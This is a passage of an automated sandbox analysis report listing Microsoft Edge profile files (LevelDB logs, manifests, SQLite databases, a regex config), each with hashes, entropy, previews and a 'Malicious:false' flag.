                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsNlstCrll:Ls3stCxl
                                                                                                                                                                  MD5:E3B2319D47340F0212B2BF7C99EE5358
                                                                                                                                                                  SHA1:5C3BE5F91AB664AADF8D20645860C2E24E774E34
                                                                                                                                                                  SHA-256:A4B0F683414779CE12096B12BAEC69803B1E533E9059007ADC82283442974957
                                                                                                                                                                  SHA-512:484BA51E300844AE3191FE696A8C0146DE6D99101C59CA97EB0EB00C9AD26C1869A0A22DEBE2A5B6FEECB0EEF3B32E37BB5416D432B8A349335F7108F66A63BC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.........................................H.H../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...m.................DB_VERSION.1

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):303
                                                                                                                                                                  Entropy (8bit):5.201184036488427
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/UERM1wkn23oH+TcwtnG2tbB2KLl91q2Pwkn23oH+TcwtnG2tMsIFUv:7/dRrfYebn9VFLz1vYfYebn9GFUv
                                                                                                                                                                  MD5:A2DA09340AA78D645D678DC01B00E938
                                                                                                                                                                  SHA1:840AE70493B06DDDDA7EFF3CB941FFCED949067C
                                                                                                                                                                  SHA-256:4754028814C1C84B497BF5CF9ECDFC05FCC635CB3FE5A832B88457C1C2F03C12
                                                                                                                                                                  SHA-512:A8B2320B8BA34A1E35928987A359C2CD4EF0230C0BC0938B733E7EFD0943C6BA4FB0EC7C6DFC0C6F99D02530401C3AB451D7AE24E4F714831C629AC6D639E3FA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.274 d04 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2025/01/06-17:17:54.292 d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.494709561094235
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                                  MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                                  SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                                  SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                                  SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.613200498775134
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLqpR+DDNzWjJ0npnyXKUO8+jTW8pVW4emL:Te8D4jJ/6Up+XTFr
                                                                                                                                                                  MD5:9356EBF5FAB0013AA9A438559AC4016A
                                                                                                                                                                  SHA1:7FB611E5DF33A2801FE031E498E4F1C5A33A7957
                                                                                                                                                                  SHA-256:21170D4E1155D8702E977E5654A00DBAD3EEE6D102881CC1B2D626EF92088E7B
                                                                                                                                                                  SHA-512:58BA7CC35EF01E58817597BEE0BDCB948E51FD9333A0A9AFEACAD43A5470D98CB596B2C8E1F53B7FB06BCDACC4667B148A148020973ED421150794E5FA7C7BCE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                  Entropy (8bit):5.3541269104370235
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:kA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:kFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                  MD5:739705141E427B35568056CD835EBF00
                                                                                                                                                                  SHA1:FE54A8349CDC4FF01DF356B270D789200E8C703B
                                                                                                                                                                  SHA-256:470AD84049818F768292CF38C86F158A02584605AA68FB7AFB346FCDD56C7E17
                                                                                                                                                                  SHA-512:AF27DFDD7CAE91CE3EF22D7CFA95C008B1447BC95C9C3A181701193EC0B17BCADB6E1D85A729E0CE8ADB24A64DB8CE84A129AC7BA6BD39DFA75453D3523D2667
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380675481237024..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):307
                                                                                                                                                                  Entropy (8bit):5.159342096833931
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/MD1wkn23oH+Tcwtk2WwnvB2KLl97KQ+q2Pwkn23oH+Tcwtk2WwnvIFUv:7/bfYebkxwnvFLz7KQ+vYfYebkxwnQF2
                                                                                                                                                                  MD5:0271DF5D31388836D4B90C119E23012C
                                                                                                                                                                  SHA1:82EB258093D9824B6FE19385DFE461908B7459C3
                                                                                                                                                                  SHA-256:A72F1EBC57F1F4AF7DD97B7DB0F80B75ECC4F323FE56EA5D86ABE986F7C0B0C4
                                                                                                                                                                  SHA-512:5CBEA10CE1D281EC1366ED84B8AF1394A08C23CDD69BE241AA0986A44768B8153197DAFFA03027DF225C25C12F5BDEEBB66E27A9B8888CD5DD462FE50784ED67
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:18:00.355 c0c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/06-17:18:00.543 c0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                  Entropy (8bit):5.32460667713101
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R/:C1gAg1zfvX
                                                                                                                                                                  MD5:D0EF3092291F5EF852970E5A36501039
                                                                                                                                                                  SHA1:ED9A780AFDF561ED40964AF436D0C9F9233E92C5
                                                                                                                                                                  SHA-256:E98DCF37EB24F0AD7577E369ABEF92F6B524A209D98D5A564E12D097CF685578
                                                                                                                                                                  SHA-512:EDE20E034864DDC3F172E1AC31A208AA86518731B0018D0E9AC0A4A016DE1BAEE3D0B52990E08A420B41C811B6FF9ECBA11A4803A9349AA0B0F1012A2C60F0D3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                  Entropy (8bit):5.173716751350752
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/5SM1wkn23oH+Tcwt8aVdg2KLl95lyq2Pwkn23oH+Tcwt8aPrqIFUv:7/5SrfYeb0Lz5IvYfYebL3FUv
                                                                                                                                                                  MD5:E2FF1C1CDC2B1D61A63D36E888849029
                                                                                                                                                                  SHA1:F9FE990728BA9AB23622D3E5D2B4CBFCC66B0191
                                                                                                                                                                  SHA-256:5725BC70811B385D820E8A1F734B476984616E2B34C36ACAACB088CCA9147119
                                                                                                                                                                  SHA-512:FD0D224282671383A277082F1497B47A8B449DF69F6450A22A8615D9706EE67B3E4FC47B406A5A0A8C81180C1F3267C8FA1BF5F3E344A92B64AD35C5AE895F25
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.272 1e94 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2025/01/06-17:17:54.294 1e94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
